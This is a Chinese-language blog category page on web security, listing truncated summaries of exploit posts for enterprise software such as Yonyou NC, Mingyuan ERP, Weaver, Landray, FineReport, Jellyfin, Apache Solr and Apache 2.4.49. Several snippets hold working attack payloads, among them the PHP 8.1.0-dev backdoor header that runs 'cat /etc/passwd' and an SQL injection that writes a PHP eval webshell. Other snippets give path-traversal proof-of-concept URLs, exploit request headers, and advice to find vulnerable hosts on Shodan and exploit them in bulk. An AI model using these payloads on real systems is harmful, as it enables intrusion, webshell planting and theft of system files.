随笔分类 - web安全
摘要:明源云 ERP 文档服务系统任意文件上传 漏洞类型:文件上传 漏洞路径:待确认 验证方式:待确认 明源ERP sso/login.aspx身份认证绕过 漏洞类型:越权 漏洞路径:/PubPlatform/nav/login/sso/login.aspx 验证方式: POST /PubPlatform
阅读全文
摘要:用友NC listUserSharingEvents 存在SQL注入 漏洞类型:SQL注入 利用路径:/portal/pt/oacoSchedulerEvents/listUserSharingEvents 验证方式:/portal/pt/oacoSchedulerEvents/listUserSh
阅读全文
摘要:亿邮电子邮件系统远程命令执行漏洞 疑似0day,未知详情 亿邮电子邮件系统认证逻辑缺陷 利用路径:/?q=login.do 亿邮邮件网关 RCE 利用路径:/usr/local/eyou/gateway/ebaselib/bin/pdftotext 验证方式: #!/bin/bash PAYLOAD
阅读全文
摘要:CVE-2021-41773是一个apache2.4.49的RCE漏洞,可以任意文件读取、远程代码执行 使用shodon.io搜索server: Apache/2.4.49 下载结果(json格式)并解析json脚本,获取url 使用工具批量利用 验证结果
阅读全文
摘要:1、shiro反序列化漏洞综合利用工具 优点:图形化、傻瓜化工具,一键getshell 缺点:利用链少,回显方式少 2、ShiroExploit 基于ysoserial项目开发,payload多 3、ysoserial配合shiro_tool ysoserial工具有多种payload 利用方式:
阅读全文
摘要:PHP 8.1.0-dev 版本在2021年3月28日被植入后门,但是后门很快被发现并清除。当服务器存在该后门时,攻击者可以通过发送User-Agentt头来执行任意代码。 添加请求头 User-Agentt: zerodiumsystem("cat /etc/passwd");
阅读全文
摘要:请求包 POST /ormrpc/services/WSCostSharingFacade HTTP/1.1 Content-Type: text/xml; charset=UTF-8 SOAPAction: "getIndexValue" User-Agent: Axis2 Host: 10.8.
阅读全文
摘要:v10.0版本不受影响 FineReport V9 注意: 这个漏洞是任意文件覆盖,上传 JSP 马,需要找已存在的 jsp 文件进行覆盖 Tomcat 启动帆软后默认存在的 JSP 文件: 比如:/tomcat-7.0.96/webapps/ROOT/index.jsp 覆盖 Tomcat 自带
阅读全文
摘要:POST /Upload/upload_file.php?l=1 HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) C
阅读全文
摘要:/api/dbstat/gettablessize /webroot/ReportServer?op=fr_base&cmd=evaluate_formula&expression=
阅读全文
摘要:https://<IP>/api/dp/rptsvcsyncpoint?ccid=1';create table O(T TEXT);insert into O(T) values('<?php @eval($_POST[1]);?>');copy O(T) to '<目标文件写入路径>';drop
阅读全文
摘要:FOFA语句: title="Jellyfin" 可以通过访问 http://<url>/Audio/anything/hls/<文件路径>/stream.mp3/ 读取任意文件。 POC: http://xxx.xxx.xxx.xxx/Audio/1/hls/..%5C..%5C..%5C..%5
阅读全文
摘要:/synccache.jsp?data=base64编码的java对象
阅读全文
摘要:漏洞位于: /page/exportImport/uploadOperation.jsp文件中 Jsp流程大概是:判断请求是否是multipart请求,然就没有了,直接上传了,啊哈哈哈哈哈 重点关注File file=new File(savepath+filename), Filename参数,是
阅读全文
摘要:漏洞URL: http://106.15.190.147/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=***注入点 在getdata.jsp中,直接将request对象交给 weaver.hrm.common.AjaxManager.getData(HttpS
阅读全文
摘要:/latrix/inandout.php txtaccesscode参数存在SQL注入漏洞
阅读全文
摘要:漏洞关注点: /sys/search/sys_search_main/sysSearchMain.do?method=editParam&fdParemNames=11&FdParameters=[shellcode] 漏洞在/sys/search/sys_search_main/sysSearch
阅读全文
摘要:分析发现是去年老洞(https://www.cnblogs.com/0day-li/p/13698863.html) 利用了两个漏洞 1)通过请求直接获取管理员权限cookie 2)通过上传一个压缩文件,调用接口进行文件在解压时会利用解压过程的漏洞利用获取webshell 利用方式: def see
阅读全文
摘要:目前测试影响版本:NC6.5 漏洞url为: /service/~xbrl/XbrlPersistenceServlet poc: import requests import threadpool import urllib3 import sys import base64 ip = "" dn
阅读全文
摘要:影响范围 Apache Solr <= 8.8.1 访问连接确认漏洞存在,并获取应用名 http://example.com/solr/admin/cores?indexInfo=false&wt=json 提交POST请求,触发漏洞 http://example.com/solr/应用名/debu
阅读全文

浙公网安备 33010602011771号